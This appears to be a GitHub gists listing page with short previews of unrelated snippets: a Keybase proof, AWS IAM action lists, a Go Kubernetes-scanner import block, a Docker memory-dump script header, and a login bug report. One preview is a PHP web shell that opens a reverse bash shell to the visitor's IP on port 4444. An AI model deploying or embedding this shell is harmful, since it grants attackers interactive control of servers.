I hereby claim:
- I am liamg on github.
- I am liam_galvin (https://keybase.io/liam_galvin) on keybase.
- I have a public key ASBy4FBuY3O_ln1NcwXXYuIqzvYSOLglD33xgtWlRQGLpQo
To claim this, I am signing this object:
| <?php | |
| $ip = $_SERVER["REMOTE_ADDR"]; | |
| set_time_limit(0); | |
| exec("/bin/bash -c 'bash -i >& /dev/tcp/$ip/4444 0>&1'"); |
| #!/usr/bin/env bash | |
| # | |
| # Generate core dumps of docker container processes | |
| # | |
| # Usage: | |
| # ./dump_docker_memory.sh [containerid] | |
| # | |
| # Output directory will be created in /tmp | |
| # |
I hereby claim:
To claim this, I am signing this object:
| account:DisableRegion | |
| account:EnableRegion | |
| account:ListRegions | |
| activate:CreateForm | |
| activate:GetAccountContact | |
| activate:GetContentInfo | |
| activate:GetCosts | |
| activate:GetCredits | |
| activate:GetMemberInfo | |
| activate:GetProgram |
| a4b:ApproveSkill | |
| a4b:AssociateSkillWithSkillGroup | |
| a4b:AssociateSkillWithUsers | |
| a4b:CompleteRegistration | |
| a4b:CreateAddressBook | |
| a4b:CreateBusinessReportSchedule | |
| a4b:CreateConferenceProvider | |
| a4b:CreateContact | |
| a4b:CreateGatewayGroup | |
| a4b:CreateNetworkProfile |
| package main | |
| import ( | |
| "context" | |
| "fmt" | |
| "os" | |
| "strings" | |
| "github.com/aquasecurity/defsec/pkg/scanners/kubernetes" | |
| ) |
First, I click "Sign in with GitHub":
At this point the page hangs for about 12 seconds.
This delay is caused by the auth callback from GitHub (https://api.semasoftware.com/v1/identities/github/cb?code=...), but it does successfully complete after this time and redirect to /dashboard, giving the impression the authentication was successful:
| testing |
| hello2 |